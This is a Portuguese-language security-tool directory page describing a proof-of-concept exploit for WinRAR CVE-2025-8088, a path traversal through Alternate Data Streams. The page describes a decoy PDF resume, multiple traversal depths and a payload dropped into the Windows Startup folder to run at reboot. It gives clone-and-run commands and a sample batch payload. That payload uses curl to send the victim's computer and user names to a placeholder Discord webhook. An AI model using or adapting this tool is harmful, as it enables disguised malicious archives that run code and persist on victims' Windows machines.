Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-8088-Exploit — A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution. | Kitploit
Ferramentas/GitHubGitHub/techcorp/cve-2025-8088-exploit
Payload GenerationExploitationWeb Application ExploitationPenetration TestingRed TeamingBinary Exploitation
GitHubtechcorp/cve-2025-8088-exploit

CVE-2025-8088-Exploit

A proof-of-concept exploit for WinRAR vulnerability (CVE-2025-8088) affecting versions 7.12 and lower. This tool creates a malicious RAR archive that embeds payloads in Alternate Data Streams (ADS) with path traversal, potentially leading to arbitrary code execution.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 9 mesesAinda não revisado

CVE-2025-8088 WinRAR Exploit 🔓

Uma prova de conceito para a vulnerabilidade do WinRAR (CVE-2025-8088) que afeta as versões 7.12 e anteriores. Esta ferramenta cria um arquivo RAR malicioso que incorpora payloads em Alternate Data Streams (ADS) com path traversal, potencialmente levando à execução arbitrária de código.

  • O problema com muitos dos outros exploits é que eles não embutem múltiplos streams ADS, exigindo sorte para ter o path traversal correto ou saber o nome de usuário/diretório de extração exato.

🚀 Como Funciona

  1. Cria um Documento Isca 📄 - Gera um PDF com aparência profissional (currículo ou relatório de pentest)
  2. Incorpora Múltiplos Streams ADS 🔄 - Anexa streams de payload com diferentes profundidades de path traversal
  3. Manipula Cabeçalhos RAR ⚙️ - Modifica a estrutura do arquivo para explorar a vulnerabilidade de path traversal
  4. Instala Payload na Inicialização 📂 - Tenta escrever o payload na pasta de inicialização do Windows quando extraído

🛠️ Uso

root@kitploit:~
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ Personalização do Payload

Edite o payload para chamar um webhook do Discord:

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Substitua YOUR_DISCORD_WEBHOOK_URL pela URL real do seu webhook.

🔄 Fluxo de Execução

  1. A vítima extrai o RAR com WinRAR vulnerável (≤7.12)
  2. O payload é escrito na pasta de inicialização:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. Na próxima reinicialização ➡️ o payload é executado automaticamente

📋 Requisitos

  • Sistema Operacional Windows 🪟
  • Python 3.x 🐍
  • WinRAR instalado
  • Biblioteca ReportLab (pip install reportlab)
Baixar ferramenta